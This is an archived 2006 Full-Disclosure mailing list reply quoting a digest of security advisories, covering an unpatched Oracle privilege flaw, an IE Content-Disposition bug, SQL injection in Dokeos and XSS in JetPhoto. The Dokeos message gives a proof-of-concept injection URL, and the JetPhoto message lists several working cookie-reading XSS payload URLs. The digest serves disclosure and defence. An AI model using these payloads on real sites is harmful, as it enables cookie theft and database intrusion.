Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

RE: Oracle read-only user can insert/update/delete data
From: "Van Winssen, Andre A SITI-ITIBHW5" <Andre.VanWinssen () shell com>
Date: Wed, 12 Apr 2006 07:38:44 +0200

Alexander,
I have to say it once again: your company is very careless and irresponsible for publishing 
so much detail about this new oracle security flaw for which no patch exists yet, endangering
many customer production databases.
I have sent testcases to Oracle too that shows that it works against any oracle version currently
available. I expect oracle to include the fix in the next cpu, but have my doubts. 

Kind regards,
Andre van Winssen

-----Original Message-----
From: full-disclosure-bounces () lists grok org uk
[mailto:full-disclosure-bounces () lists grok org uk]On Behalf Of
full-disclosure-request () lists grok org uk
Sent: dinsdag 11 april 2006 13:00
To: full-disclosure () lists grok org uk
Subject: Full-Disclosure Digest, Vol 14, Issue 19


Send Full-Disclosure mailing list submissions to
        full-disclosure () lists grok org uk

To subscribe or unsubscribe via the World Wide Web, visit
        https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
        full-disclosure-request () lists grok org uk

You can reach the person managing the list at
        full-disclosure-owner () lists grok org uk

When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."


Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you.


Today's Topics:

   1. Oracle read-only user can insert/update/delete    data via
      specially crafted views (Kornbrust, Alexander)
   2. Microsoft Internet Explorer Content-Disposition   HTML File
      Handling Flaw (Darren Bounds)
   3. [MU-200604-01] Cyrus SASL DIGEST-MD5      Pre-Authentication
      Denial of Service (noreply () musecurity com)
   4. SCOSA-2006.18 UnixWare 7.1.4 : MySQL User-Defined Function
      Buffer Overflow Vulnerability (SCO Security Advisories)
   5. [ MDKSA-2006:069 ] - Updated openvpn packages fix
      vulnerability (security () mandriva com)
   6. [ MDKSA-2006:070 ] - Updated openvpn packages fix
      vulnerability (security () mandriva com)
   7. Dokeos 1.6.4 SQL Injection Vulnerability (Alvaro Olavarria)
   8. Re: [Apparmor-dev] Re: [Full-disclosure] Re: [SC-L] Re:
      [Owasp-dotnet]    RE: 4 Questions:Latest IE vulnerability, Firefox
      vs IE security, User vs   Admin risk profile, and browsers coded in
      100% Managed Verifiable code (Crispin Cowan)
   9. JetPhoto Multiple Cross-Site Scripting    Vulnerabilitie
      (0o_zeus_o0 elitemexico.org)


----------------------------------------------------------------------

Message: 1
Date: Mon, 10 Apr 2006 14:11:38 +0200
From: "Kornbrust, Alexander" <ak () red-database-security com>
Subject: [Full-disclosure] Oracle read-only user can
        insert/update/delete    data via specially crafted views
To: <full-disclosure () lists grok org uk>
Message-ID:
        <1C09DF36EB7A3F489633C919E741350162C6A0 () mapibe09 exchange xchg>
Content-Type: text/plain;       charset="us-ascii"

Hello Full Disclosure

Last Thursday 6th April 2006, Oracle released a note on the Oracle
knowledgebase Metalink with details about an unfixed security
vulnerability (=0day) and a working test case (=exploit code) which
effects all versions of Oracle from 9.2.0.0 to 10.2.0.3. This note
"363848.1 - A User with SELECT Object Privilege on Base Tables Can
Delete Rows from a View" was available last week to Metalink customers.
The note was also displayed in the daily headlines section of the
Metalink.
 
That's why this information can be assumed as public knowledge and
DBAs/Developers which missed the note on Metalink should know this
vulnerability in order to avoid/mitigate the risk (if possible) whilst
waiting for a patch from Oracle.

After noticing the note, I informed Oracle secalert that releasing such
information on Metalink is not a wise idea. Oracle normally criticises
individuals and/or companies for releasing information about Oracle
vulnerabilities (like David Litchfield from NGSSoftware for releasing
information an ever not fixed bug in mod_plsql gateway). In this case,
not only Oracle released detailed information on the vulnerability; they
also included the working exploit code on the Metalink. 

In an interview few months ago, the Oracle CSO stated:  "I've known
customers to terminate contracts ... for releasing exploit code... you
might get applause from hackers... but business will not pay you to slit
their throats. With knowledge comes responsibility." 

After my email, Oracle removed the note from Metalink. 


Problem: 

In Oracle versions (9.2.0.0-10.2.0.3) exists an unpatched vulnerability
which allows users with "SELECT" only privileges on a base table to
insert/update/ delete data via a specially crafted view.

The impact of this vulnerability on the Oracle data dictionary is low
because most data dictionary tables don't have a primary key which is a
requirement for this vulnerability.

The impact on custom applications can be huge and eliminate the entire
role concept because in well designed applications there is normally a
read-only role for low-privilege users (e.g. reporting or external
auditors). If these low-privileged users are able to create a view,
which is standard in Oracle 9.2.x to 10 g R1, they could also insert,
update and delete data via a specially crafted view. Depending on the
architecture, it is possible to modify data, escalate privileges, ...


Test cases:

Oracle provided a complete test case in note 363848.1. I decided not to
publish such code on the internet as long as patches are not available.
If you need additional information you could contact me via email. A
test case (without the specially crafted view) is available on my
website:

http://www.red-database-security.com/advisory/oracle_modify_data_via_vie
ws.html



Patches:

Currently there are no patches available. According to Oracle secalert
Oracle will provide patches in a future critical patch update.
 
Red-Database-Security is not convinced that the April 2006 CPU will
contain patches against this vulnerability.



Workarounds / Risk Mitigation:

Sanitize the connect role (9i - 10g R1) and remove the CREATE VIEW (and
CREATE DATABASE LINK, ...) privilege from the connect role. 
Removing the primary key from the base table solves the problem too. Be
aware that this could cause performance and integrity issues on the
application.

Oracle recommends creating views the option "WITH CHECK OPTION". This 
recommendation helps against accidental modification but not against
hackers. 


Credits:

Special thanks to Jens Flasche who made Red-Database-Security aware of
the 
Metalink note and for the first analysis + additional test cases. 



URLs:

Interview: Oracle CSO - Mary Ann Davidson
http://news.com.com/When+security+researchers+become+the+problem/2010-10
71_3-5807074.html

Metalink Hacking
http://www.red-database-security.com/wp/oracle_metalink_hacking_us.pdf




----------------------------------------------------------------------

Are you interested in additional information about Oracle security?


Our next Oracle Anti-Hacker-Training:

23-may - 26-may   (4 days (english) - Milano / Italy) 
29-may - 2-june   (5 days (english) - Cupertino [CA] / U.S.A) 
19-june - 23-june (5 days (german)  - Oberursel/Frankfurt / Germany) 

----------------------------------------------------------------------



------------------------------

Message: 2
Date: Mon, 10 Apr 2006 10:22:43 -0400
From: "Darren Bounds" <dbounds () gmail com>
Subject: [Full-disclosure] Microsoft Internet Explorer
        Content-Disposition     HTML File Handling Flaw
To: full-disclosure () lists grok org uk, webappsec () securityfocus com
Message-ID:
        <26563eca0604100722p4f9878dfjc91a646ed31b80a8 () mail gmail com>
Content-Type: text/plain; charset=ISO-8859-1

Microsoft Internet Explorer Content-Disposition HTML File Handling Flaw
April 10, 2006

Content-Disposition (defined in RFC 2183) is often used by web
application developers as a mechanism to instruct the web browser on
how it should handle a file download. This is commonly used to help
prevent access to the application scope when handling file attachments
and mitigates the ability to leverage client-side attacks, such as
XSS, through file downloads.

While Internet Explorer does handle downloading most file types
correctly with Content-Disposition, it mishandles HTML files and
instead opens them inline, exposing the application scope. As such, it
is strongly advisable that web-based software vendors use alternative
methods to mitigate this class of attack.

A simple PoC is available at the following URL:
http://xs.vc/content-disposition/
Feel free to compare the results of Firefox and IE.

Vulnerable Versions:
All versions up to and including Internet Explorer 7 Beta 2.

References:
http://www.faqs.org/rfcs/rfc2183.html
http://support.microsoft.com/kb/182315/
http://msdn.microsoft.com/library/default.asp?url=/workshop/networking/moniker/overview/mime_handling.asp

I felt it was necessary to make this flaw public now because while the
weakness results from IEs flawed support of RFC 2183, the exposure is
with the 3rd party applications which support it.

Due to the simplicity of exploitation, it is not unlikely this is
being used in the wild.


Thank you,

Darren Bounds



------------------------------

Message: 3
Date: Mon, 10 Apr 2006 19:05:41 +0100 (BST)
From: noreply () musecurity com
Subject: [Full-disclosure] [MU-200604-01] Cyrus SASL DIGEST-MD5
        Pre-Authentication Denial of Service
To: full-disclosure () lists grok org uk
Message-ID: <20060410180541.0EA3CAB () lists grok org uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cyrus SASL DIGEST-MD5 Pre-Authentication Denial of Service [MU-200604-01]
April 7, 2006

http://labs.musecurity.com/advisories.html

Affected Product/Versions:

cyrus-sasl-2.1.18

Product Overview:

SASL (Simple Authentication Security Layer) is an Internet standards-track
method for remote computers to authenticate. The Cyrus SASL library makes
supporting various SASL mechanisms easy for both client and server writers.

Vulnerability Details:

A denial of service condition exists in the SASL authentication library during
DIGEST-MD5 negotiation. This potentially affects multiple products that use
SASL DIGEST-MD5 authentication including OpenLDAP, Sendmail, Postfix, Apple,
etc.

Vendor Response / Solution:

All users of this authentication library are recommended to upgrade to 2.1.21
which fixes these problems.

Hotfix solution to this advisory:

ftp://ftp.andrew.cmu.edu/pub/cyrus-mail/cyrus-sasl-2.1.21.tar.gz

Mu Security would like to thank the SASL team in advance for timely
remediation of these vulnerabilities.

Credit:

This vulnerability was discovered by the Mu Security research team.

http://labs.musecurity.com/pgpkey.txt

Mu Security is an early-stage innovator creating a new class of security
analysis system. The company's mission is to widely deploy security analysis
and reduce product and application vulnerabilities.  Mu's founders include
industry-recognized  experts in the IDP, open source protocol analysis tools,
ethical hacking, and network management markets. The security analysis process
and product solution provide a rigorous and streamlined methodology for
verifying and improving the security readiness of any IP-based product or
application.  Mu Security, headquartered in Sunnyvale, California, is backed
by preeminent venture capital firms including Accel Partners and Benchmark
Capital.

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are no
warranties, implied or express, with regard to this information. In no event
shall the author be liable for any direct or indirect damages whatsoever
arising out of or in connection with the use or spread of this information.
Any use of this information is at the user's own risk.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (Darwin)

iD8DBQFEOptFMl+docYeP+YRAtF3AJ4lonQmv4AafPOU1+890u/o+oiD5wCgh7iw
HcT0MJfwuxFzv5DFqU64zoA=
=plHS
-----END PGP SIGNATURE-----



------------------------------

Message: 4
Date: Mon, 10 Apr 2006 11:41:34 -0700
From: SCO Security Advisories <security () sco com>
Subject: [Full-disclosure] SCOSA-2006.18 UnixWare 7.1.4 : MySQL
        User-Defined Function Buffer Overflow Vulnerability
To: security-announce () list sco com
Message-ID: <443AA6DE.9040600 () sco com>
Content-Type: text/plain; charset="iso-8859-1"


-- 
Dr. Ronald Joe Record
SCO Security Officer
rr () sco com
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: SCOSA-2006.18.txt
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060410/f9d171e2/SCOSA-2006.18.txt

------------------------------

Message: 5
Date: Mon, 10 Apr 2006 18:50:00 -0600
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2006:069 ] - Updated openvpn
        packages fix    vulnerability
To: full-disclosure () lists grok org uk
Message-ID: <E1FT74y-0001PZ-Fq () mercury mandriva com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:069
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : openvpn
 Date    : April 10, 2006
 Affected: 2006.0, Multi Network Firewall 2.0
 _______________________________________________________________________
 
 Problem Description:
 
 A vulnerability in OpenVPN 2.0 through 2.0.5 allows a malicious server
 to execute arbitrary code on the client by using setenv with the
 LD_PRELOAD environment variable.
 
 Updated packages have been patched to correct this issue by removing
 setenv support.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1629
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 699824d9aa9e42bf579165599268efbb  2006.0/RPMS/openvpn-2.0.1-2.2.20060mdk.i586.rpm
 38bb27a8f28546fe9cdf06213a172868  2006.0/SRPMS/openvpn-2.0.1-2.2.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 4e8a99c3997f8ecd7e41aee1594a02dc  x86_64/2006.0/RPMS/openvpn-2.0.1-2.2.20060mdk.x86_64.rpm
 38bb27a8f28546fe9cdf06213a172868  x86_64/2006.0/SRPMS/openvpn-2.0.1-2.2.20060mdk.src.rpm

 Multi Network Firewall 2.0:
 04b0406ea806da8e1f941910b0f19659  mnf/2.0/RPMS/openvpn-2.0.1-0.3.M20mdk.i586.rpm
 825a02efe56ddc34fcdc49784c50b1e1  mnf/2.0/SRPMS/openvpn-2.0.1-0.3.M20mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEOtIjmqjQ0CJFipgRAqpeAKDqMshbTjMvJ7br1OYItcXPrIOjJQCg3Vxd
Rg6Iai6SktCas/Y/Mpfrguw=
=3uVj
-----END PGP SIGNATURE-----



------------------------------

Message: 6
Date: Mon, 10 Apr 2006 19:40:00 -0600
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2006:070 ] - Updated openvpn
        packages fix    vulnerability
To: full-disclosure () lists grok org uk
Message-ID: <E1FT7rM-0001Yo-9k () mercury mandriva com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:070
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : sash
 Date    : April 10, 2006
 Affected: 10.2, 2006.0, Corporate 3.0, Multi Network Firewall 2.0
 _______________________________________________________________________
 
 Problem Description:
 
 Tavis Ormandy of the Gentoo Security Project discovered a vulnerability
 in zlib where a certain data stream would cause zlib to corrupt a data
 structure, resulting in the linked application to dump core
 (CVE-2005-2096).
 
 Markus Oberhumber discovered additional ways that a specially-crafted
 compressed stream could trigger an overflow.  An attacker could create
 such a stream that would cause a linked application to crash if opened
 by a user (CVE-2005-1849).
 
 Both of these issues have previously been fixed in zlib, but sash links
 statically against zlib and is thus also affected by these issues.  New
 sash packages are available that link against the updated zlib packages.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1849
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2096
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 10.2:
 290e5d895235afaaa1548d4898c5cde8  10.2/RPMS/sash-3.7-3.1.102mdk.i586.rpm
 6cb36fc925f8793ef0f22a1d0adacb24  10.2/SRPMS/sash-3.7-3.1.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 4088008711f30343c6ddbd45dd4429f0  x86_64/10.2/RPMS/sash-3.7-3.1.102mdk.x86_64.rpm
 6cb36fc925f8793ef0f22a1d0adacb24  x86_64/10.2/SRPMS/sash-3.7-3.1.102mdk.src.rpm

 Mandriva Linux 2006.0:
 6a8ef8036ca25661d6e1e18e826b7cf7  2006.0/RPMS/sash-3.7-3.1.20060mdk.i586.rpm
 ebfdd661247a673a536d14b57bd1494f  2006.0/SRPMS/sash-3.7-3.1.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 f3ace9f835ba2bcf3358404ec3b35863  x86_64/2006.0/RPMS/sash-3.7-3.1.20060mdk.x86_64.rpm
 ebfdd661247a673a536d14b57bd1494f  x86_64/2006.0/SRPMS/sash-3.7-3.1.20060mdk.src.rpm

 Corporate 3.0:
 76d84869521a8231bde684d29c909f77  corporate/3.0/RPMS/sash-3.6-5.1.C30mdk.i586.rpm
 5a52429713ca8dabda8fe0462eedbf41  corporate/3.0/SRPMS/sash-3.6-5.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 5fdfa411aaa588d14e3f92d877b31e0b  x86_64/corporate/3.0/RPMS/sash-3.6-5.1.C30mdk.x86_64.rpm
 5a52429713ca8dabda8fe0462eedbf41  x86_64/corporate/3.0/SRPMS/sash-3.6-5.1.C30mdk.src.rpm

 Multi Network Firewall 2.0:
 b1d67ff8736048c8687708ff614d995b  mnf/2.0/RPMS/sash-3.6-5.1.M20mdk.i586.rpm
 df79ea5562d8e2d45f98ead903f1b4c7  mnf/2.0/SRPMS/sash-3.6-5.1.M20mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEOtv8mqjQ0CJFipgRAvmaAKDbjEYQYMNmbwm5XFF37ClR4W2+rACfSszW
RKonuFKGLwS+UEca0OtVDUc=
=I//9
-----END PGP SIGNATURE-----



------------------------------

Message: 7
Date: Mon, 10 Apr 2006 21:47:00 -0400 (CLT)
From: "Alvaro Olavarria" <aolavarria () secure cl>
Subject: [Full-disclosure] Dokeos 1.6.4 SQL Injection Vulnerability
To: full-disclosure () lists grok org uk
Cc: rodrigo () secure cl, info () securiteam com, bugtraq () securityfocus com,
        submissions () packetstormsecurity org
Message-ID: <50544.201.221.203.126.1144720020.squirrel () www rgsc cl>
Content-Type: text/plain;charset=iso-8859-1

Dokeos 1.6.4 SQL Injection Vulnerability


Author: Alvaro Olavarria <aolavarria () secure cl>

Affected: Dokeos <= 1.6.4
Status: Notified hereby
Vendor url: http://www.dokeos.com


Background.

Dokeos is an Open Source elearning and course management web application
translated in 34 languages
and helping more than 1.000 organisations worldwide to manage learning and
collaboration activities.


Vulnerability.

Dokeos was built using Claroline's code; it inherited several of its
features including an old version
 of phpBB which is being used as the forum for the courses.   There is a
problem  in the "viewtopic.php",
 where the $topic variable is not correctly sanitized and $forumview is
equal to "threaded", that would
allow an attacker to inject arbitrary code to the application.


Impact

An attacker could use Blind SQL Injection to gain access to privileged
data like the password hashes
for the administrator user and so on.


Proof of Concept

http://localhost/claroline/phpbb/viewtopic.php?cidReq=102&gidReq=&forum=1&0&forumview=threaded&topic=1[blind_sql_inject]


Greetings

Rodrigo Guitierrez <rodrigo () secure cl>
University of Los Lagos in Chile "for lending the required equipment for
testing" >:D





------------------------------

Message: 8
Date: Mon, 10 Apr 2006 16:28:23 -0700
From: Crispin Cowan <crispin () novell com>
Subject: Re: [Apparmor-dev] Re: [Full-disclosure] Re: [SC-L] Re:
        [Owasp-dotnet]  RE: 4 Questions:Latest IE vulnerability, Firefox vs IE
        security, User vs       Admin risk profile, and browsers coded in 100%
        Managed Verifiable code
To: Brian Eaton <eaton.lists () gmail com>
Cc: Pascal Meunier <pmeunier () cerias purdue edu>,
        full-disclosure () lists grok org uk,
        Administrator () vegeta digitalrazor com,       apparmor-dev () forge novell com
Message-ID: <443AEA17.2090406 () novell com>
Content-Type: text/plain; charset=ISO-8859-1

Brian Eaton wrote:
Does cap_setuid give a program enough authority to break out of the
AppArmor profile?
  
No, cap_setuid is not sufficient. In fact, being full root is not
sufficient to break out of AppArmor confinement. Rood daemons being one
of the greatest threats to the system, AppArmor would not be very useful
if it could not confine root.

Crispin
-- 
Crispin Cowan, Ph.D.                      http://crispincowan.com/~crispin/
Director of Software Engineering, Novell  http://novell.com



------------------------------

Message: 9
Date: Mon, 10 Apr 2006 20:52:08 -0500
From: "0o_zeus_o0 elitemexico.org" <zeus.olimpusklan () gmail com>
Subject: [Full-disclosure] JetPhoto Multiple Cross-Site Scripting
        Vulnerabilitie
To: full-disclosure () lists grok org uk, admin () zone-h org,
        bugtraq () securityfocus com
Message-ID:
        <558f59870604101852r491b1860we3f4d90c9a7caa98 () mail gmail com>
Content-Type: text/plain; charset="iso-8859-1"

###########################################################################
# Advisory #11 Title: JetPhoto Multiple Cross-Site Scripting Vulnerabilitie
#
#
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: zeus () diosdelared com
# Website: www.elitemexico.org
# Date: 10/04/06
# Risk: Medium
# Vendor Url: http://www.jetphotosoft.com
# Affected Software: JetPhoto
# Non Affected:
#
#Info:
##################################################################
#this bug consists of inserting script in the line of execution of
#
#the affected system causing the robbery of cookie
#
#Example XSS:
##################################################################
#
#http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=webalbum&page=<script>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=JetPhoto_Album&page=<script>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Classic.view/gallery.php?name=JetPhoto_Album&page=<script>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Classic.view/detail.php?name=JetPhoto_Album&page=<script>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Orange.view/slideshow.php?name=<script></script><script>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Orange.view/detail.php?name=1&page=<script>alert(
document.cookie);</script>
#
#http://www.vuln.com/[path]/view/Orange.view/detail.php?name=1&page=<script>alert(
document.cookie);</script>
#
##################################################################
#
#Solution:
##################################################################
#
#
#VULNERABLE VERSIONS
##################################################################
#all
#
##################################################################
#Contact information
#0o_zeus_o0
#zeus () diosdelared com
#www.elitemexico.org
##################################################################
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
#
# original advisorie: http://www.elitemexico.org/11.txt
##################################################################
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060410/cd943874/attachment-0001.html

------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

End of Full-Disclosure Digest, Vol 14, Issue 19
***********************************************


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault